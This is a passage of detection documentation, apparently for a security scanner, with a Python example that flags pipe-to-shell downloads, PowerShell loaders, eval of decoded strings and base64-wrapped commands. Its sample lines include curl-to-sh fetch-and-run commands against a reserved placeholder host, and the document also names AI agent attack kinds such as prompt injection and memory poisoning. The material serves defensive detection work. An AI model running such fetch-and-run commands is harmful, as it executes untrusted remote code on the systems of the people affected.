# 7. Detection Methodology

### Malware & campaign patterns

Known malware families and exploit signatures.

### Obfuscation detection

Base64 payloads, eval construction, encoded strings.

### Credential theft indicators

Cloud keys, exchange APIs, wallets, CI/CD secrets.

### Remote execution indicators

`curl | sh`, `wget | bash`, PowerShell loaders.
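The following is an added example, not code from the original page or the project it describes. It is a minimal line scanner covering the remote execution indicators above and the base64/eval indicators listed under Obfuscation detection. The rule names, the regular expressions, the 24-character base64 threshold and the sample lines are all assumptions made for illustration.

```python
import base64
import re

RULES = {
    # Downloader output piped straight into a shell interpreter.
    "pipe-to-shell": re.compile(
        r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b", re.I),
    # PowerShell started with an encoded command or a download-and-run cradle.
    "powershell-loader": re.compile(
        r"powershell(?:\.exe)?\b.*(?:-enc(?:odedcommand)?\b|downloadstring|\biex\b)", re.I),
    # eval/exec applied to a string decoded or built at run time.
    "eval-of-decoded-string": re.compile(
        r"\b(?:eval|exec)\s*\(.*(?:atob|b64decode|fromCharCode)", re.I),
}
# Candidate base64 run; the 24-character threshold is an assumption.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def decoded_payloads(line):
    """Yield printable UTF-8 text recovered from base64 runs in a line."""
    for match in B64_RUN.finditer(line):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            text = raw.decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if text.isprintable():
            yield text

def scan(line, depth=0):
    """Return sorted indicator names for a line, decoding up to two layers."""
    found = {name for name, rx in RULES.items() if rx.search(line)}
    if depth < 2:
        for text in decoded_payloads(line):
            if inner := scan(text, depth + 1):
                found.update(inner, ["base64-wrapped"])
    return sorted(found)

# Constructed samples; example.invalid is a reserved, non-resolving name.
WRAPPED = base64.b64encode(b"curl https://example.invalid/x | sh").decode()
SAMPLES = [
    "curl -fsSL https://example.invalid/install.sh | sh",
    f"echo {WRAPPED} | base64 -d | sh",
    'eval(atob("aGVsbG8="))',
    "powershell -nop -w hidden -enc <constructed-blob>",
    "curl -fsSL https://example.invalid/install.sh -o install.sh",
]
for sample in SAMPLES:
    print(scan(sample), "<-", sample)
```

The second sample matches nothing until its base64 run is decoded, which is why the scanner re-scans decoded text rather than matching the raw line only.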

### Agent exploitation patterns

Prompt injection, memory poisoning, confused deputy.

### Threat intelligence

Known malicious publishers, wallets, IPs, domains.
